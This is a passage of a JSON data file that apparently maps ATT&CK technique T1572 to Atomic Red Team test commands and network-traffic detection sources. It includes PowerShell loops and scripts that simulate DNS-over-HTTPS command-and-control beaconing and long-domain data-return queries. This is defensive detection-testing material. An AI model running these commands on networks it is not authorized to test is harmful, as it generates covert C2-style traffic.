This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1572", + "command_list": [ + "for($i=0; $i -le #{query_volume}; $i++) { (Invoke-WebRequest \"https://8.8.8.8/resolve?name=#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}\" -UseBasicParsing).Content }\n", + "for($i=0; $i -le #{query_volume}; $i++) { (Invoke-WebRequest \"#{doh_server}?name=#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}&type=TXT\" -UseBasicParsing).Content }\n", + "for($i=0; $i -le #{query_volume}; $i++) { (Invoke-WebRequest \"#{doh_server}?name=atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}\" -UseBasicParsing).Content }\n", + "for($i=0; $i -le 1000; $i++) { (Invoke-WebRequest \"#{doh_server}?name=#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}\" -UseBasicParsing).Content }\n", + "for($i=0; $i -le #{query_volume}; $i++) { (Invoke-WebRequest \"#{doh_server}?name=#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io&type=#{query_type}\" -UseBasicParsing).Content }\n", + "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer https://8.8.8.8/resolve -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + null, + "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer #{doh_server} 
-Domain 127.0.0.1.xip.io -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain atomicredteam -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer https://8.8.8.8/resolve -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}\n", + "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT\n", + "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType #{query_type}\n", + "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer #{doh_server} -Domain 127.0.0.1.xip.io -Subdomain #{subdomain} -QueryType #{query_type}\n" + ], + "commands": [ + { + "command": "for($i=0; $i -le #{query_volume}; $i++) { (Invoke-WebRequest \"https://8.8.8.8/resolve?name=#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}\" -UseBasicParsing).Content }\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "for($i=0; $i -le #{query_volume}; $i++) { (Invoke-WebRequest \"#{doh_server}?name=#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}&type=TXT\" -UseBasicParsing).Content }\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team 
Test - Protocol Tunneling" + }, + { + "command": "for($i=0; $i -le #{query_volume}; $i++) { (Invoke-WebRequest \"#{doh_server}?name=atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}\" -UseBasicParsing).Content }\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "for($i=0; $i -le 1000; $i++) { (Invoke-WebRequest \"#{doh_server}?name=#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}\" -UseBasicParsing).Content }\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "for($i=0; $i -le #{query_volume}; $i++) { (Invoke-WebRequest \"#{doh_server}?name=#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io&type=#{query_type}\" -UseBasicParsing).Content }\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer https://8.8.8.8/resolve -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": null, + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer #{doh_server} -Domain 127.0.0.1.xip.io -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain atomicredteam -QueryType 
#{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer https://8.8.8.8/resolve -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType #{query_type}\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer #{doh_server} -Domain 127.0.0.1.xip.io -Subdomain #{subdomain} -QueryType #{query_type}\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1572", + "display_name": "Protocol Tunneling", + "atomic_tests": [ + { + "name": "DNS over HTTPS Large Query Volume", + "auto_generated_guid": "ae9ef4b0-d8c1-49d4-8758-06206f19af0a", + 
"description": "This test simulates an infected host sending a large volume of DoH queries to a command and control server.\nThe intent of this test is to trigger threshold based detection on the number of DoH queries either from a single source system or to a single targe domain.\nA custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout in a JSON format.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "doh_server": { + "description": "Default DoH resolver", + "type": "String", + "default": "https://8.8.8.8/resolve" + }, + "query_type": { + "description": "DNS query type", + "type": "String", + "default": "TXT" + }, + "subdomain": { + "description": "Subdomain prepended to the domain name", + "type": "String", + "default": "atomicredteam" + }, + "query_volume": { + "description": "Number of DNS queries to send", + "type": "Integer", + "default": "1000" + }, + "domain": { + "description": "Default domain to simulate against", + "type": "String", + "default": "127.0.0.1.xip.io" + } + }, + "executor": { + "command": "for($i=0; $i -le #{query_volume}; $i++) { (Invoke-WebRequest \"#{doh_server}?name=#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}\" -UseBasicParsing).Content }\n", + "name": "powershell" + } + }, + { + "name": "DNS over HTTPS Regular Beaconing", + "auto_generated_guid": "0c5f9705-c575-42a6-9609-cbbff4b2fc9b", + "description": "This test simulates an infected host beaconing via DoH queries to a command and control server at regular intervals over time.\nThis behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.\nA custom domain and sub-domain will need to be passed as input parameters for this test to work. 
Upon execution, DNS information about the domain will be displayed for each callout in a JSON format.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "doh_server": { + "description": "Default DoH resolver", + "type": "String", + "default": "https://8.8.8.8/resolve" + }, + "runtime": { + "description": "Time in minutes to run the simulation", + "type": "Integer", + "default": 30 + }, + "domain": { + "description": "Default domain to simulate against", + "type": "String", + "default": "127.0.0.1.xip.io" + }, + "subdomain": { + "description": "Subdomain prepended to the domain name", + "type": "String", + "default": "atomicredteam" + }, + "query_type": { + "description": "DNS query type", + "type": "String", + "default": "TXT" + }, + "c2_interval": { + "description": "Seconds between C2 requests to the command and control server", + "type": "Integer", + "default": 30 + }, + "c2_jitter": { + "description": "Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests", + "type": "Integer", + "default": 20 + } + }, + "executor": { + "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "name": "powershell" + } + }, + { + "name": "DNS over HTTPS Long Domain Query", + "auto_generated_guid": "748a73d5-cea4-4f34-84d8-839da5baa99c", + "description": "This test simulates an infected host returning data to a command and control server using long domain names.\nThe simulation involves sending DoH queries that gradually increase in length until reaching the maximum length. 
The intent is to test the effectiveness of detection of DoH queries for long domain names over a set threshold.\n Upon execution, DNS information about the domain will be displayed for each callout in a JSON format.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "doh_server": { + "description": "Default DoH resolver", + "type": "String", + "default": "https://8.8.8.8/resolve" + }, + "query_type": { + "description": "DNS query type", + "type": "String", + "default": "TXT" + }, + "subdomain": { + "description": "Subdomain prepended to the domain name (should be 63 characters to test maximum length)", + "type": "String", + "default": "atomicredteamatomicredteamatomicredteamatomicredteamatomicredte" + }, + "domain": { + "description": "Default domain to simulate against", + "type": "String", + "default": "127.0.0.1.xip.io" + } + }, + "executor": { + "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network 